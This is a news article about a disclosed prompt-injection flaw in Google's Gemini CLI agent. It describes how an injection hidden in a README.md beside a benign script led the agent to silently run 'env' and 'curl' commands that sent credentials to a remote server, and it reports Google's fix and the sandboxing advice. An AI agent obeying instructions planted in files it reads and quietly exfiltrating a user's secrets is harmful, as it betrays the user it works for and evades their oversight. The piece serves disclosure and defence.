Google’s Gemini CLI agent could run malicious code silently

Google's Gemini CLI agent could run malicious code silently

The recently introduced Google Gemini CLI agent, which provides a text based command interface to the company’s artificial intelligence large language model, could be tricked into silently executing malicious commands, a security researcher has discovered.



Tracebit security researcher Sam Cox discovered the vulnerability, which “through a toxic combination of improper validation, prompt injection and misleading UX, inspecting untrusted code consistently leads to silent execution of malicious commands.”

By hiding a prompt injection in a README.md file which contained the full text of the GNU Public Licence as well, to accompany a benign Python script that the target could be likely to run, Cox was able to coax Gemini into exfiltrating credentials using the “env” and “curl” commands to a listening remote server.

Google's Gemini CLI agent could run malicious code silently

Google initally triaged the vulnerability Cox found as Priority 2, Severity 4, in its Bug Hunters program after Cox reported it on June 27.

About three weeks later, Google reclassified the vulnerability as the most serious Priority 1, Severity 1 which requires urgent, immediate attention as it could lead to significant data compromise, unauthorised access and/or code execution.

Users are advised to upgrade to Gemini 0.1.14 which has safeguards for shell code execution and mitigate the above attack.

Enabling “sandboxing”, which is an isolated environment that protects users’ systems, would also prevent the attack Cox discovered.

However, after installation Gemini CLI by default runs without sandboxing, although the tool prominently warns users that this is the case.


Source link